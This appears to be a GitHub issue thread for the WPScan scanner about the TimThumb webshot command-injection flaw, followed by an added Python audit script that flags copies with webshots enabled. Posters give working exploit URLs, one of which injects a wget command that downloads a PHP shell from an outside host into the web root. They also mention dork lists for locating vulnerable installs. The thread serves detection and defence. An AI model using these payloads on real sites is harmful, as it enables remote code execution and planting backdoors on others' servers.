hexlax closed this issue 10 years ago
Hi, the detection for this one is already in WPScan: https://github.com/wpscanteam/wpscan/commit/dd53c7b200dc12d3c0b7a3ba2b94e134cae13336 (Some details can be found here: https://github.com/wpscanteam/wpscan/issues/506)
For the vuln, payloads from all the exploits / advisories I found are wrong. I was able to reproduce the exploit with the following payload:
http://wp.lab/wordpress-3.9.1/wp-content/timthumbs/2.8.13-ws-enabled.php?webshot=1&src=http://picasa.com/$(touch$IFS/tmp/file.txt)
The major change from the advisories is the value of the src param. It wasn't working with the same URL as the target; in fact, you have to use an allowed site listed here (this might change depending on the version you are using): https://code.google.com/p/timthumb/source/browse/trunk/timthumb.php?r=219#131
Please also note that the path to CutyCapt must be correct (I had to modify it in my Debian lab).
Furthermore, if you have some up-to-date timthumb locations, we would be interested :) (so far we have all those: https://github.com/wpscanteam/wpscan/blob/master/data/timthumbs.txt)
erwanlr, thanks for the input. As far as finding timthumbs not currently found in wpscan, I've had success searching for "timthumb dorks" and adding those to the data/timthumbs.txt file in wpscan. I have scrubbed a couple of these dork lists for you here: http://pastebin.com/4vTS0Lnf
Great :)
Merged your list with ours and we gained around 100 locations :)
Thanks!
Sweet!! Got it working and am able to download a backdoor shell. The attacker would need to know the full path of the web root (/home/user/public_html) to save the shell in for this example:
http://wp.local/timthumb.php?webshot=1&src=http://picasa.com/$(wget$IFS'example.com/php_shell.txt'$IFS-O$IFS/home/user/public_html/shell.php)
I was not able to reproduce the latest TimThumb vulnerability in the lab while following the directions for enabling webshots. Although the beta webshots feature is disabled by default and requires manually building CutyCapt from source on the server, preliminary searches of "(‘WEBSHOT_ENABLED’, true)" here on GitHub did produce about five results.
Was anyone able to verify that this vuln exists for RCE? If so, is this on roadmap to include in future wpscan development?
Vuln announcements: http://cxsecurity.com/issue/WLB-2014060134 http://blog.sucuri.net/2014/06/timthumb-webshot-code-execution-exploit-0-day.html
Thanks for contributing to such a great tool!
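As an added, defender-side example (not code from this thread or from WPScan): a small Python audit that walks a WordPress document root and flags every TimThumb copy whose WEBSHOT_ENABLED define is set to true, the precondition the comments above say the webshot issue depends on. It assumes the flag is set with PHP's define(), either in timthumb.php itself or in a timthumb-config.php override beside it; the sample tree it inspects is constructed inline.

```python
import os
import re
import tempfile

# define('WEBSHOT_ENABLED', true) in either quote style, loose spacing, any case.
WEBSHOT_RE = re.compile(
    r"define\s*\(\s*['\"]WEBSHOT_ENABLED['\"]\s*,\s*(true|false)\s*\)", re.IGNORECASE)
# TimThumb's own define('VERSION', '2.8.13'), used to report which copy was found.
VERSION_RE = re.compile(r"define\s*\(\s*['\"]VERSION['\"]\s*,\s*['\"]([^'\"]+)['\"]")

def webshot_state(source):
    """True/False when the PHP source defines WEBSHOT_ENABLED, None when it does not."""
    m = WEBSHOT_RE.search(source)
    return None if m is None else m.group(1).lower() == "true"

def audit_tree(root):
    """Walk a document root and return (relative path, version) for every PHP file
    that defines WEBSHOT_ENABLED as true: the timthumb.php copy itself or a
    timthumb-config.php override beside it. Unreadable files are skipped."""
    findings = []
    for dirpath, _, files in os.walk(root):
        for name in sorted(files):
            if not name.endswith(".php"):
                continue
            path = os.path.join(dirpath, name)
            try:
                with open(path, encoding="utf-8", errors="replace") as fh:
                    src = fh.read()
            except OSError:
                continue
            if webshot_state(src):
                ver = VERSION_RE.search(src)
                findings.append((os.path.relpath(path, root), ver.group(1) if ver else None))
    return findings

# Constructed stand-in for the config lines of a TimThumb 2.8.13 copy (not the real file).
TIMTHUMB_STUB = ("<?php\ndefine ('VERSION', '2.8.13');\n"
                 "if(! defined('WEBSHOT_ENABLED') ) define ('WEBSHOT_ENABLED', %s);\n")

def demo():
    """Constructed sample tree: one copy with webshots on, one left at the default (off)."""
    root = tempfile.mkdtemp()
    for sub, flag in (("wp-content/themes/demo-theme", "true"),
                      ("wp-content/plugins/demo-plugin", "false")):
        os.makedirs(os.path.join(root, sub))
        with open(os.path.join(root, sub, "timthumb.php"), "w") as fh:
            fh.write(TIMTHUMB_STUB % flag)
    return audit_tree(root)
```

Run audit_tree() against a real document root to get the list of copies to disable or update; a copy that reports webshots on should also be checked for the CutyCapt binary path the thread mentions.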